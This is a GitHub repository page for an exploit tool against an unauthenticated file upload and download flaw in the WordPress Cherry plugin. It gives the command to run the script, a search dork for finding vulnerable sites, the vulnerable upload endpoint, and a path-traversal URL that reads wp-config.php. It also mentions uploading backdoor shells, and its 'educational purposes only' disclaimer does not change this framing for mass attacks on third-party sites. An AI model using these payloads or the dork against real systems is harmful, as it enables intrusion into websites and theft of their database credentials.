Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly

Appearance settings

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.

Notifications You must be signed in to change notification settings

InMyMine7/Cherry-Plugin

Open more actions menu

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

3 Commits
 
 
 
 
 
 

Repository files navigation

WordPress (CMS) Cherry-Plugin Arbitrary File Upload RCE

Requirement :

  • Python 2.7.18
  • pip 19.2.3

How To Usage :

python2 sxc.py

Example Dork

inurl:/wp-content/plugins/cherry-plugin/

Proof of Concept

Upload: The following file was affected: https://www.example.com/wp-content/plugins/cherry-plugin/admin/import-export/upload.php

Download: https://example.com/wp-content/plugins/cherry-plugin/admin/import-export/download-content.php?file=../../../../../wp-config.php

Classification Type : UPLOAD CWE : CWE-434

DISCLAIMER : THIS TOOLS IS FOR EDUCATIONAL PURPOSES ONLY. AND WE DO NOT CONDONE ANY ILLEGAL ACTIVITIES

About

The cherry plugin WordPress plugin was affected by an unauthenticated file upload and download vulnerability, allowing attackers to upload and download arbitrary files. This could result in attacker uploading backdoor shell scripts or downloading the wp-config.php file.

Topics

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages

Morty Proxy This is a proxified and sanitized view of the page, visit original site.